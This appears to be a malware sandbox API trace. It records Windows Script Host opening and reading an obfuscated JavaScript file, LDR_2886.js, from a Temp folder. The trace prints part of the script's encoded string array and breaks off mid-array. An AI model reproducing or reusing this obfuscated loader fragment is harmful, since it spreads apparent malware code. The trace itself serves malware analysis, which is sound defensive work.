	[0083.999] CoCreateInstance (in: rclsid=0x7fee1475d88*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee1475d98*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x306af0 | out: ppv=0x306af0*=0x3675b0) returned 0x0
	[0083.999] IUnknown:AddRef (This=0x3675b0) returned 0x2
	[0083.999] GetCurrentProcessId () returned 0xb14
	[0083.999] GetCurrentThreadId () returned 0xb28
	[0083.999] GetTickCount () returned 0x25a20
	[0083.999] ISystemDebugEventFire:BeginSession (This=0x3675b0, guidSourceID=0x7fee1475da8, strSessionName="JScript:00002836:00002856:18154144") returned 0x0
	[0083.999] GetCurrentThreadId () returned 0xb28
	[0083.999] ??2@YAPEAX_K@Z () returned 0x3071e0
	[0083.999] ??2@YAPEAX_K@Z () returned 0x307230
	[0083.999] malloc (_Size=0x80) returned 0x3072e0
	[0083.999] malloc (_Size=0x108) returned 0x307370
	[0083.999] GetTickCount () returned 0x25a20
	[0083.999] GetCurrentThreadId () returned 0xb28
	[0083.999] ??2@YAPEAX_K@Z () returned 0x307480
	[0084.000] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\ldr_2886.js"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x110
	[0084.000] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4b68
	[0084.000] CreateFileMappingA (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4b68, lpName=0x0) returned 0x114
	[0084.000] MapViewOfFile (hFileMappingObject=0x114, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x110000
	[0084.000] GetVersionExA (in: lpVersionInformation=0x22efd0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xfd343301, dwBuildNumber=0x7fe, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x22efd0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0084.000] IsTextUnicode (in: lpv=0x110000, iSize=19304, lpiResult=0x22efc0 | out: lpiResult=0x22efc0) returned 0
	[0084.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x110000, cbMultiByte=19304, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19304
	[0084.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x110000, cbMultiByte=19304, lpWideCharStr=0x36f978, cchWideChar=19304 | out: lpWideCharStr="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 19304
	[0084.001] UnmapViewOfFile (lpBaseAddress=0x110000) returned 1
	[0084.001] CloseHandle (hObject=0x114) returned 1
	[0084.001] CloseHandle (hObject=0x110) returned 1
	[0084.001] GetSystemDirectoryA (in: lpBuffer=0x22f048, uSize=0x0 | out: lpBuffer="\x8c\xf4\x22") returned 0x14
	[0084.001] ??2@YAPEAX_K@Z () returned 0x3074d0
	[0084.001] GetSystemDirectoryA (in: lpBuffer=0x3074d0, uSize=0x15 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0084.001] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\advapi32.dll") returned 0x7fefd710000
	[0084.001] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0084.001] GetProcAddress (hModule=0x7fefd710000, lpProcName="SaferIdentifyLevel") returned 0x7fefd72e470
	[0084.002] GetProcAddress (hModule=0x7fefd710000, lpProcName="SaferComputeTokenFromLevel") returned 0x7fefd72f9b0
	[0084.002] GetProcAddress (hModule=0x7fefd710000, lpProcName="SaferCloseLevel") returned 0x7fefd72f660
	[0084.002] IdentifyCodeAuthzLevelW () returned 0x1
	[0084.110] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22e1c0 | out: lpSystemTimeAsFileTime=0x22e1c0*(dwLowDateTime=0xaa7df910, dwHighDateTime=0x1d543d1)) 
	[0084.110] GetCurrentProcessId () returned 0xb14
	[0084.110] GetCurrentThreadId () returned 0xb28
	[0084.110] GetTickCount () returned 0x25a8d
	[0084.110] QueryPerformanceCounter (in: lpPerformanceCount=0x22e1c8 | out: lpPerformanceCount=0x22e1c8*=20853604560) returned 1
	[0084.110] malloc (_Size=0x100) returned 0x307b60
	[0084.110] GetVersionExA (in: lpVersionInformation=0x22dfa0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xe33af810, dwBuildNumber=0x7fe, dwPlatformId=0xe33a0000, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x22dfa0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0084.110] GetUserDefaultLCID () returned 0x409
	[0084.110] IsFileSupportedName () returned 0x1
	[0084.110] _wcsicmp (_String1=".vbs", _String2=".js") returned 12
	[0084.111] _wcsicmp (_String1=".vbe", _String2=".js") returned 12
	[0084.111] _wcsicmp (_String1=".js", _String2=".js") returned 0
	[0084.114] GetSignedDataMsg () returned 0x0
	[0084.114] GetCurrentProcess () returned 0xffffffffffffffff
	[0084.114] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x114, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x22e800, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x22e800*=0x140) returned 1
	[0084.114] GetFileSize (in: hFile=0x140, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4b68
	[0084.114] ??2@YAPEAX_K@Z () returned 0x309f30
	[0084.115] SetFilePointer (in: hFile=0x140, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0084.115] ReadFile (in: hFile=0x140, lpBuffer=0x309f30, nNumberOfBytesToRead=0x4b68, lpNumberOfBytesRead=0x22e7e0, lpOverlapped=0x0 | out: lpBuffer=0x309f30*, lpNumberOfBytesRead=0x22e7e0*=0x4b68, lpOverlapped=0x0) returned 1
	[0084.115] CoInitialize (pvReserved=0x0) returned 0x1
	[0084.115] CoCreateInstance (in: rclsid=0x7fee33af850*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee33af860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppv=0x22e750 | out: ppv=0x22e750*=0x30ef00) returned 0x0
	[0084.119] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22c950 | out: lpSystemTimeAsFileTime=0x22c950*(dwLowDateTime=0xaa7df910, dwHighDateTime=0x1d543d1)) 
	[0084.119] GetCurrentProcessId () returned 0xb14
	[0084.119] GetCurrentThreadId () returned 0xb28
	[0084.119] GetTickCount () returned 0x25a8d
	[0084.119] QueryPerformanceCounter (in: lpPerformanceCount=0x22c958 | out: lpPerformanceCount=0x22c958*=20854550335) returned 1
	[0084.120] malloc (_Size=0x100) returned 0x307c70
	[0084.120] __dllonexit () returned 0x7fedf7914c0
	[0084.120] __dllonexit () returned 0x7fedf7914e8
	[0084.120] GetVersionExA (in: lpVersionInformation=0x22c730*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x7fe, dwMinorVersion=0xdf792dc9, dwBuildNumber=0x7fe, dwPlatformId=0xdf7914e8, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x22c730*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0084.120] GetProcessWindowStation () returned 0x30
	[0084.120] GetUserObjectInformationA (in: hObj=0x30, nIndex=1, pvInfo=0x22c718, nLength=0xc, lpnLengthNeeded=0x22c710 | out: pvInfo=0x22c718, lpnLengthNeeded=0x22c710) returned 1
	[0084.120] ??2@YAPEAX_K@Z () returned 0x30eaa0
	[0084.120] ??2@YAPEAX_K@Z () returned 0x30eaf0
	[0084.120] ??2@YAPEAX_K@Z () returned 0x30eb20
	[0084.120] ??2@YAPEAX_K@Z () returned 0x30eb60
	[0084.120] ??2@YAPEAX_K@Z () returned 0x30eba0
	[0084.120] ??2@YAPEAX_K@Z () returned 0x30ebe0
	[0084.120] ??2@YAPEAX_K@Z () returned 0x30ec20
	[0084.120] ??2@YAPEAX_K@Z () returned 0x30ec60
	[0084.120] ??2@YAPEAX_K@Z () returned 0x30eca0
	[0084.120] ??2@YAPEAX_K@Z () returned 0x30ece0
	[0084.120] ??2@YAPEAX_K@Z () returned 0x30ed20
	[0084.120] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0084.120] ??2@YAPEAX_K@Z () returned 0x30ed70
	[0084.120] ??2@YAPEAX_K@Z () returned 0x30edb0
	[0084.120] DllGetClassObject (in: rclsid=0x36e400*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), riid=0x7fefebb6cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x22d420 | out: ppv=0x22d420*=0x30eaf0) returned 0x0
	[0084.120] ??2@YAPEAX_K@Z () returned 0x30eaf0
	[0084.121] IClassFactory:CreateInstance (in: This=0x30eaf0, pUnkOuter=0x0, riid=0x22e200*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x22d440 | out: ppvObject=0x22d440*=0x30ef00) returned 0x0
	[0084.121] ??2@YAPEAX_K@Z () returned 0x30edf0
	[0084.121] GetSystemInfo (in: lpSystemInfo=0x22d280 | out: lpSystemInfo=0x22d280*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0084.121] VirtualQuery (in: lpAddress=0x22d2f0, lpBuffer=0x22d2b0, dwLength=0x30 | out: lpBuffer=0x22d2b0*(BaseAddress=0x22d000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0084.121] ??2@YAPEAX_K@Z () returned 0x30ee30
	[0084.121] ??2@YAPEAX_K@Z () returned 0x30ee50
	[0084.121] ??2@YAPEAX_K@Z () returned 0x30eeb0
	[0084.121] ??2@YAPEAX_K@Z () returned 0x30eee0
	[0084.121] ??2@YAPEAX_K@Z () returned 0x30ef90
	[0084.121] IUnknown:AddRef (This=0x30ef00) returned 0x2
	[0084.121] IUnknown:Release (This=0x30ef00) returned 0x1
	[0084.121] IUnknown:Release (This=0x30eaf0) returned 0x0
	[0084.121] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0084.121] IUnknown:QueryInterface (in: This=0x30ef00, riid=0x7fee33af860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x22e688 | out: ppvObject=0x22e688*=0x30ef00) returned 0x0
	[0084.121] IUnknown:Release (This=0x30ef00) returned 0x1
	[0084.122] _strnicmp (_Str1="<?xml", _Str="var d", _MaxCount=0x5) returned -58
	[0084.122] IsTextUnicode (in: lpv=0x309f30, iSize=19304, lpiResult=0x22e6d8 | out: lpiResult=0x22e6d8) returned 0
	[0084.122] GetACP () returned 0x4e4
	[0084.122] malloc (_Size=0x97d0) returned 0x43dfd0
	[0084.122] GetACP () returned 0x4e4
	[0084.122] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x309f30, cbMultiByte=19304, lpWideCharStr=0x43dfd0, cchWideChar=19432 | out: lpWideCharStr="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w